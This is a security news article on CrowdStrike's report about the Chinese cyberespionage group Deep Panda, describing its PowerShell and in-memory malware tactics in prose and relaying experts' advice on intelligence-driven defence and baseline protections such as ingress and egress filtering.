Defensive tactics against sophisticated cyberspies

Aligning security systems with intelligence gathered on groups of elite hackers working for nation states is a key defense for targeted organizations, experts say.

The importance of such a strategy was highlighted this week in a report that found a particular band of Chinese hackers capable of switching targets quickly as geopolitical events changed.

[Chinese cyberspies targeting U.S., European defense, space sectors]

The cyberespionage group, dubbed Deep Panda, shifted focus from U.S. policy experts on Southeast Asia to those following insurgents in Iraq once the rebels began threatening China's investment in the country's oil industry, security vendor CrowdStrike reported.

Defending against such flexible attackers requires a steady stream of intelligence on such groups, so rules can be updated in firewalls and intrusion detection systems (IDS) and indicators refreshed in security information and event management (SIEM) products.

These constant intelligence-based adjustments are an effective way to at least stay even with the attackers.

"You can't take your IDS out of the box, plug it in and expect that to make a difference," Adam Meyers, vice president of threat intelligence for CrowdStrike, said.

Instead, the systems have to be continuously updated based on the changing tactics, techniques and procedures of the hackers, Meyers said.

"Understanding the threat actor, understanding what their motivation is and understanding how they operate is really what CIOs should be taking away from this report," he said.

In the case of Deep Panda, CrowdStrike found that the group breached their victim's networks using Windows PowerShell scripts. PowerShell is a task automation and configuration framework from Microsoft.

The attackers also downloaded and executed from memory a .Net executable called "Wafer," which would download and run a remote access tool (RAT) called MadHatter, one of Deep Panda's favorites, CrowdStrike said.

Running everything in memory keeps malicious files off the hard drive, making them more difficult to detect.

"This is typical for Deep Panda," CrowdStrike said in its blog. "Stealth is their specialty and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time."

[U.S. files indictments against Chinese officials for espionage]

This is the kind of information that can be used in readjusting security technology. At the same time, organizations should use a set of technologies considered the defensive baseline, Paul Henry, senior instructor at the SANS Institute said.

The technologies include:

--Ingress filtering that allow into the network data packets only from those regions of the world where a company does business.

--Using technology that produces hash values for accessing critical data.

--Anti-virus software to block known threats and whitelisting technology to block unknown programs and scripts from executing.

--Egress filtering that prevents sensitive data from leaving an organization's network.

Join the CSO newsletter!

Error: Please check your email address.

Tags CrowdStrikeapplicationsmalware protectionChinese hackingChinese malwaresoftwareadvanced persistent threatsdata protectionnation-state attacksChinese spyingIraq

More about MicrosoftPandaSANS Institute

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Antone Gonsalves

Latest Videos

  • 150x50

    CSO Webinar: Will your data protection strategy be enough when disaster strikes?

    Speakers: - Paul O’Connor, Engagement leader - Performance Audit Group, Victorian Auditor-General’s Office (VAGO) - Nigel Phair, Managing Director, Centre for Internet Safety - Joshua Stenhouse, Technical Evangelist, Zerto - Anthony Caruana, CSO MC & Moderator

    Play Video

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

More videos

Blog Posts

Market Place